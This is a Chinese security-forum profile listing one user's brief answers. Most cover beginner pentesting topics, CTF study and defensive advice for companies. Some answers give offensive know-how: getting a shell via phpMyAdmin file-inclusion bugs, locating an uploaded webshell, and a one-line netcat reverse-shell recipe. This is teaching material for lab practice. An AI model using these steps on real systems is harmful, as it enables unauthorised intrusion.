金蝉子
金蝉子

性别: 注册于 2021-04-21

向TA求助
64金币数
203 经验值
1个粉丝
主页被访问 5180 次

13 个回答

0 赞同

phpmyadmin如何进行getshell提取操作?

查看phpmyadmin的版本,搜索历史漏洞,例如phpmyadmin4.8.1文件包含漏洞https://mp.weixin.qq.com/s?__biz=MzIzMTc1MjExOQ==&mid=2247485036&idx=1&sn=8e9647906c5d94f72564dec5bc51a2ab&chksm=e89e2eb4dfe9a7a28bff2efebb5b2723782dab660acff074c3f18c9e7dca924abdf3da618fb4&mpshare=1&scene=1&amp...

回答于 2021-11-15 11:12

0 赞同

burp抓包到底是抓的流量包还是本地包,为什么有人说是本地包,有...

一楼说的很对,外网访问网站抓包是数据包,断网本地bp玩靶场就是本地包,反正都是截取数据包

回答于 2021-11-14 18:45

0 赞同

cs无法启动

可能内存太小了,或者文件不完整

回答于 2021-11-08 11:24

1 赞同

作为一个对白帽黑客完全不了解的新手小白,该如何从C++亦或是C语...

建议先从python入手,除非你要打ctf并且是当一名pwn手

回答于 2021-10-25 19:19

1 赞同

请求类的文件上传的路径如何查找

翻翻js,可能会存在路径查看网站本身是否有图片,下载图片,复制下载链接,查看链接是否含有绝对路径

回答于 2021-09-03 18:37

1 赞同

上传了木马,但找不到在哪里,有什么好办法吗?

不知道你上传的文件是会回显一部分,还是全部不回显,回显一部分的话我有一点经历1.查看当前页面是否有网页本身自带的图片,右键复制链接,然后用你bp抓包上传的路径代替图片路径2.你先上传张jpg图片,看是否能下载或者另存为,然后再复制下载路径,替换图片路径全部不回显的话,大多数不太好找

回答于 2021-08-27 23:57

0 赞同

如何反弹shell

用nc瑞士军刀啊攻击机nc -lvvp 端口靶机nc ip  端口

回答于 2021-08-26 22:15

0 赞同

求大佬指教,新手应该怎么入门漏洞挖掘,我现在只会简单的使用Bu...

初学者建议先看视频和看书,并且有空就去各大论坛去看些文章,学点新方法,扩展攻击面,之后搭建靶场练习,比如owasp,pikachu等,熟悉使用sqlmap等工具,再开始学习编程,如果学不会,那大概也要了解,起码得看得懂,之后可以先去试试edu,渐渐的熟悉挖洞技巧

回答于 2021-08-17 08:53

0 赞同

关于无列名注入的技巧?

回答于 2021-08-17 00:05

0 赞同

【2021BCS×补天 参与话题讨论赢三倍金币】站在白帽子的角度,您...

1.增强公司员工安全意识,账号不外泄,链接(邮件)不乱点2.对外网访问的服务器架设硬件和软件防火墙,内网也一样最好架一个VPN,且所有员工用户权限设为访问3.当出现应急事故时,处理应急事件的速度,并且对此次事故进行分析,避免下次再出现类似情况4.当网上出现在野0day或1day时,及时修补,避免漏洞被不法份子利用5.对公司用户账号...

回答于 2021-08-10 20:48